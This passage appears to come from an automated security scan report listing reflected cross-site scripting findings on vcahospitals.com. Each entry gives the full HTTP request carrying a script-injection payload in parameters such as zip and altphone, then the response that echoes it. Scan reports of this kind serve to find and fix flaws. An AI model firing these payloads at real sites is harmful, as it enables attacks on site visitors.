26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=1e180"><script>alert(1)</script>28aed0a1907&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=uonisgvh1t257tmgqd61oiinl5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
IE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=1e180"><script>alert(1)</script>28aed0a1907&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.81. http://www.vcahospitals.com/main/offer/ [zip parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a500"><script>alert(1)</script>61d16eaa101 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=9a500"><script>alert(1)</script>61d16eaa101 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:40 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=lcvbtovbqbfupdtekad2l559v5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=9a500"><script>alert(1)</script>61d16eaa101" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.82. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/thank-you.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe76"><script>alert(1)</script>5ff898b7043 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/thank-you.htmlebe76"><script>alert(1)</script>5ff898b7043?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:22:58 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 15209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer/thank-you.htmlebe76"><script>alert(1)</script>5ff898b7043?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&stat
...[SNIP]...

2.83. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/thank-you.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 754ff"><script>alert(1)</script>e83ec5aaa248053f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /main/offer/thank-you.html754ff"><script>alert(1)</script>e83ec5aaa248053f6?fname=&lname=&addr=&city=&state=AK&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D353284&referer=&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&ipaddress=173.193.214.243&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&formtype=CORP&newmex=0&date=1307084400&tollfree=866-825-8416 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:22:50 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 15197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer/thank-you.html754ff"><script>alert(1)</script>e83ec5aaa248053f6?fname=&lname=&addr=&city=&state=AK&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D353284&referer=&uri=h
...[SNIP]...

2.84. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/manhattan-veterinary-group/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f764"><a>39ac731bfc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /manhattan-veterinary-group/appt.html4f764"><a>39ac731bfc3 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:46:42 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<body id="appt4f764"><a>39ac731bfc3">
...[SNIP]...

2.85. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/manhattan-veterinary-group/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c5c9"><script>alert(1)</script>49734066e86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /manhattan-veterinary-group/appt.html?7c5c9"><script>alert(1)</script>49734066e86=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/manhattan-veterinary-group/appt.html?7c5c9"><script>alert(1)</script>49734066e86=1" />
...[SNIP]...

2.86. http://www.vcahospitals.com/marshfield/appt.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/marshfield/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21aa2"><a>e74c5ada644 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /marshfield/appt.html21aa2"><a>e74c5ada644 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:47:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<body id="appt21aa2"><a>e74c5ada644">
...[SNIP]...

2.87. http://www.vcahospitals.com/marshfield/appt.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/marshfield/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd2e3"><script>alert(1)</script>47355e93e99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marshfield/appt.html?fd2e3"><script>alert(1)</script>47355e93e99=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:15 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/marshfield/appt.html?fd2e3"><script>alert(1)</script>47355e93e99=1" />
...[SNIP]...

2.88. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ea8b"><a>f918a068f09 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /new-york-veterinary-hospital/appt.html5ea8b"><a>f918a068f09 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:46:43 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<body id="appt5ea8b"><a>f918a068f09">
...[SNIP]...

2.89. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [altphone parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the altphone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ac2"><script>alert(1)</script>30c7bc9b5b5 was submitted in the altphone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=d9ac2"><script>alert(1)</script>30c7bc9b5b5&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcu